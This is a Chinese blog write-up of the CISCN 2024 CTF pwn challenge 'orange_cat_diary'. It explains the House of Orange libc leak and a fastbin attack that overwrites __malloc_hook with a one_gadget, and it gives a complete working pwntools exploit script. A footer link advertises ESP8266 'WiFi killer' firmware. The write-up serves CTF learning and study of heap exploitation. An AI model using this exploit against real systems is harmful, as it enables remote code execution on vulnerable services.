【PWN · House_Of_Orange | fastbin-attack】[CISCN 2024 初赛] orange_cat_diary

最新推荐文章于 2024-05-20 22:22:59 发布
最新推荐文章于 2024-05-20 22:22:59 发布
阅读量1.2k 收藏 13
点赞数 10
分类专栏: 【PWN · Heap】 文章标签: ctf pwn house of orange heap fastbin attack
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_Fmnwon/article/details/139048316
版权

蒟蒻现做现学.。。说实话,house系列,之前都不敢下手,想着积淀积淀。没想到,嗯,还挺简单。

目录

前言

一、House-Of-Orange

二、简单的wp

三、EXP

总结 

前言

审计一下题目:经典菜单,edit,show,add,delete俱全

嗯,啧啧,delete还有个UAF太明显,爽爽unsortedbin-leak-libc!

——what!show只能一次,delete只能一次!!!救命。。。我该怎么做。

一、House-Of-Orange

虽然说house系列我不敢轻易上手学,但是各个手法的名字我还是听过的——本题的名字就叫做Orange_cat_diary,是不是一种暗示?

典型题目

Hitcon CTF 2016 - house of orange 做题笔记_hticon house of orange-CSDN博客

关于house of orange(unsorted bin attack &&FSOP)的学习总结 - ZikH26 - 博客园 (cnblogs.com)(2021安询杯,和本题高度相似)

适用范围

2.23——2.26

◆没有free

◆可以unsortedbin attack、

利用方式

stage1

◆申请chunk A,假设此时的top_chunksize0xWXYZ。

◆写A,溢出修改top_chunksize0xXYZ(需要满足页对齐的检测条件)。

◆申请一个大于0xXYZ大小的chunk,此时top_chunk会进行grow,并将原来的old top_chunk释放进入unsortedbin。

stage2

◆溢出写A,修改处于unsortedbin中的old top_chunk,修改其size0x61,其bk&_IO_list_all-0x10,同时伪造好IO_FILE结构。

◆申请非0x60大小的chunk的时候,首先触发unsortedbin attack,将_IO_list_all修改为main_arena+88,然后unsortedbin chunk会进入到smallbin,大小为0x60;接着遍历unsortedbin的时候触发了malloc_printerr,然后调用链为:malloc_printerr -> libc_message -> abort -> _IO_flush_all_lockp,调用到伪造的vtable里面的函数指针。

注意:可以在没有free的情况下leak libc!这正是我们所需要的 

二、简单的wp

Free后指针未清零,存在UAF漏洞,但是本题有几个限制

free和show只有一次机会。

基本思路是hook劫持,首先要泄露libc,受限于free只能free一次,于是用house_of_orange手法(题目名称也暗示了)leak libc。此时只用了一次show

然后用唯一的一次free机会,进行fastbin-attack;用uaf将bin里的fastbinchunk-next写fake-chunk到malloc_hook附近。

写malloc_hook劫持为one_gadget即可

orange_cat_diary利用链:

  1. show只有一次机会的限制:利用house_of_orange进行leak libc

  2. free只有一次机会的限制:利用uaf进行fastbin-attack

  3. 劫持fake-chunk到malloc_hook附近

  4. 劫持malloc_hook到one_gadget

  5. malloc触发malloc_hook

三、EXP

from pwn import *
context(arch='amd64',log_level='debug')

one_gadget=[0x45226,0x4527a,0xf03a4,0xf1247] # 0xf03a4成功了
for onegadget in one_gadget:
    # io=process('./pwn')
    # gdb.attach(io);input()
    io=remote(ip,port)
    libc=ELF('./libc-2.23.so')

    def add(size,content):
        io.sendlineafter(b'choice:',b'1')
        io.sendlineafter(b'content:',str(size).encode())
        io.sendlineafter(b'content:',content)

    def edit(size,content):
        io.sendlineafter(b'choice:',b'4')
        io.sendlineafter(b'content:',str(size).encode())
        io.sendlineafter(b'content:\n',content)

    def show():
        io.sendlineafter(b'choice:',b'2')

    def delete():
        io.sendlineafter(b'choice:',b'3')

    io.sendline(b'name')
    io.recvuntil(b'stories.\n')
    add(0x18,b'aa')
    edit(0x20,p64(0)*3+p64(0xfe1))
    add(0x1000,b'')
    add(0x30,b'')
    # print(show())
    show()
    main_arena=u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-1514
    success(hex(main_arena))
    malloc_hook=main_arena-0x10
    libc_base=main_arena-0x3c3b20-0x1000 #一开始本地的libc版本有点问题,正确的libc刚好还要偏0x1000
    success(hex(libc_base))
    fake_chunk=malloc_hook-0x23

    add(0x60,b'')
    delete()
    edit(0x60,p64(fake_chunk))
    add(0x60,b'')
    add(0x60,b'')

    '''
    0x45226 execve("/bin/sh", rsp+0x30, environ)
    constraints:
    rax == NULL

    0x4527a execve("/bin/sh", rsp+0x30, environ)
    constraints:
    [rsp+0x30] == NULL

    0xf03a4 execve("/bin/sh", rsp+0x50, environ)
    constraints:
    [rsp+0x50] == NULL

    0xf1247 execve("/bin/sh", rsp+0x70, environ)
    constraints:
    [rsp+0x70] == NULL
    '''

    # payload=p64(0)+b'\x00\x00\x00'+p64(libc_base+onegadget)+p64(libc_base+libc.sym['realloc']) 一开始libc错了,还以为堆风水不好,,,(实际是libc基址都错了,也就有了上面的-0x1000)
    # edit(0x60,payload)
    edit(0x60,b'\x00'*0x13+p64(libc_base+onegadget))
    io.sendlineafter(b'choice:',b'1')
    io.sendlineafter(b'content:',b'sh')
    io.interactive()

总结

比较惊险,磨了半天,学习house of orange然后利用,居然真的过了。那一刻的高兴至今难忘。

Mr_Fmnwon
关注
专栏目录
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
2016-HitCon-Pwn-house_of_orange学习(附赠FSOP基础知识)
a2590035252的博客
10-25 653
[md]这里开始著名的house of orange利用方式讲解 house of orange 介绍 House of Orange 与其他的 House of XX 利用方法不同,这种利用方法来自于 Hitcon CTF 2016 中的一道同名题目。由于这种利用方法在此前的 CTF 题目中没有出现过,因此之后出现的一系列衍生题目的利用方法我们称之为 House of Orange。 概述 House of Orange 的利用比较特殊,首先需要目标漏洞是堆上的漏洞但是特殊之处在于题目中不存在 free
PWNHouse of Orange&House of Pig(待完整例题)
u014377094的博客
05-06 695
House of Orange House of Orange的利用背景在缺少free条件。为了达到free的效果,通过修改top chunk的size位,当malloc的空间大于top chunk时触发brk,使top chunk被放置在unsorted bin。 利用条件: 1.堆有 mmap 和 brk 两种分配方式,我们需要让堆以 brk 的形式拓展,之后原有的 top chunk 会被置于 unsorted bin 中。要实现 brk 拓展 top chunk,但是要实现这个目的需要绕过一.
PWN技巧之_IO_FILE结构体利用house of orange
aptx4869_li的博客
02-16 1130
PWN技巧之_IO_FILE结构体利用house of orange
orange_cat
fuiifiuiii的博客
05-20 393
另:其实不用add那么多次,一次直接改就行,只不过是边打边学的house of orange,刚开始没想明白,后来懒得删上面的了,因为会有些微的地址的差距,懒得再改了。将这个块free掉,修改它的fd指针为伪造的fast_chunk,然后用fastbin attack 打malloc_hook。创建一个0x60大小的块,从unsoterd bin中分割出来,再打印这个块,打印出对应的libc地址。top_chunk 的后三位+size(不包括符号位,符号位要为1),&FFF为0。
第十七届全国大学生信息安全竞赛创新实践能力赛初赛CISCN-2024部分WP)
Welcome To Myon'Blog !
05-20 2482
给的 e 其实就是 d,只是结果是移位后的输出,n 很大无法分解,但 kk 与 rr 很小,由 rr= e//n 即可推出 rr 和 kk,又由 e + x + kk*p + rr*((p+1)* (q+1))+ 1 = 65537,将 × 设为 0 和 2^200 然后联立求解一元二次方程,就能求出 p, q 的上下界,这样就有p 和q 的高位,枚举未知位尝试coppersmith 直到分解出结果,最后代入求 e 和 d,进而求得flag。
CISCN初赛wp misc,re,pwn,web,crypto
fivesheeptree的博客
05-20 1130
CISCN初赛wp misc,re,pwn,web,crypto
PWM.zip_PWM脉冲发生器_pwn proteus_单片机 pwn_脉冲 仿真_脉冲发生器PWM
09-24
PWM,即脉宽调制(Pulse Width Modulation),是一种广泛应用的数字控制技术,主要用于调节电子设备的功率或模拟信号。在单片机系统中,PWM脉冲发生器是核心部件,它通过改变脉冲宽度来调整输出信号的平均电压,从而...
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
Out_of_Hand__Attacks_Against_PHP_Environments-Powerful_PHP_Pwn_Primitives.pdf
08-08
当前web应用漏洞变得越来越复杂。对于这些流行网站和应用所用到的底层编程语言和框架的理解程度,对是否能够发现高危漏洞起到重要作用。本议题中,将会深入探讨PHP 7.4的一些最新feature,以及如何利用这些feature去...
PWN的一些做题记录
Zoxiee的博客
12-30 471
基本只记录思路,不贴exp 更多PWN基础知识笔记可能在这里 hitcon2016 houoforange 思路:2.23,unsortedbin attack伪造IO_FILE和vtable,要libc.symbols[’_IO_list_all’] 程序可以无限制溢出,从而修改unsorted bin内容,直接把unsortbin的size修改为0x60(small bin),同时修改bk位置为IO_list_all-0x10,从而往任意地址写unsortednom本身地址,因为 unsorted_ch
攻防世界PWN之bufoverflow_a题解(house of orange in 2.24&house of Einherjar)
seaaseesa的博客
02-19 994
bufoverflow_a 首先,我们检查一下程序的保护机制 然后,我们用IDA分析一下,是一个经典的增删改查的程序,然后我们看到创建堆时,前两个堆是用malloc创建,后面的堆用calloc创建,这意味着,如果要泄露libc地址,只能靠前两个堆,后面的堆从bin里取出后会清空里面的信息。 Fill功能存在一个null off by one漏洞 我们每次只能对最后创建的那个堆进...
CTF-PWN-house-of-orange (unsortedbin attack+IO_FILE文件结构利用)
SuperGate的博客
02-22 985
程序综述 [*] '/home/supergate/Desktop/Pwn/houseoforange' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled FORTIFY: ...
House of orange
seaaseesa的博客
02-14 1734
House of orange因一道同名的题而来,它是在程序没有调用free函数的情况下利用其它漏洞结合IO_FILE来达到利用。 首先利用漏洞修改top chunk的size,然后申请一个比size大的堆,满足一定条件,这个top chunk就会被释放到unsorted bin里。 利用unsorted bin attack,将__IO_list_all指针改写为unsorted bin的头...
pre-push commit规范检查
10-12
pre-push commit规范检查
基于yolov5和deepsort的行人跟踪计数系统高分项目+源码 2.zip
10-12
个人经导师指导并认可通过的高分项目,评审分98分。主要针对计算机相关专业和需要项目实战练习的学习者,也可作为课程设计、期末大作业。个人经导师指导并认可通过的高分项目,评审分98分。主要针对计算机相关专业和需要项目实战练习的学习者,也可作为课程设计、期末大作业。个人经导师指导并认可通过的高分项目,评审分98分。主要针对计算机相关专业和需要项目实战练习的学习者,也可作为课程设计、期末大作业。个人经导师指导并认可通过的高分项目,评审分98分。主要针对计算机相关专业和需要项目实战练习的学习者,也可作为课程设计、期末大作业。个人经导师指导并认可通过的高分项目,评审分98分。主要针对计算机相关专业和需要项目实战练习的学习者,也可作为课程设计、期末大作业。个人经导师指导并认可通过的高分项目,评审分98分。主要针对计算机相关专业和需要项目实战练习的学习者,也可作为课程设计、期末大作业。个人经导师指导并认可通过的高分项目,评审分98分。主要针对计算机相关专业和需要项目实战练习的学习者,也可作为课程设计、期末大作业。个人经导师指导并认可通过的高分项目,评审分98分。主要针对计算机相关专业和需要项目实战练习
2019京栋C++面试笔试资料2019京栋C++面试笔试资料
10-12
2019京栋C++面试笔试资料2019京栋C++面试笔试资料
2022爱奇亿秋招C++开发工程师笔试资料
最新发布
10-12
2022爱奇亿秋招C++开发工程师笔试资料
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值